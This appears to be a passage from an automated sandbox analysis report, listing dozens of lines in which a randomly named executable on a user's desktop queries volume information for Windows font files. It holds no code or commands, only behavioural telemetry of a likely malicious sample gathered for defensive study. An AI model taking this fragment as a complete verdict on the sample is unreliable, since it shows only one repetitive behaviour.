          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
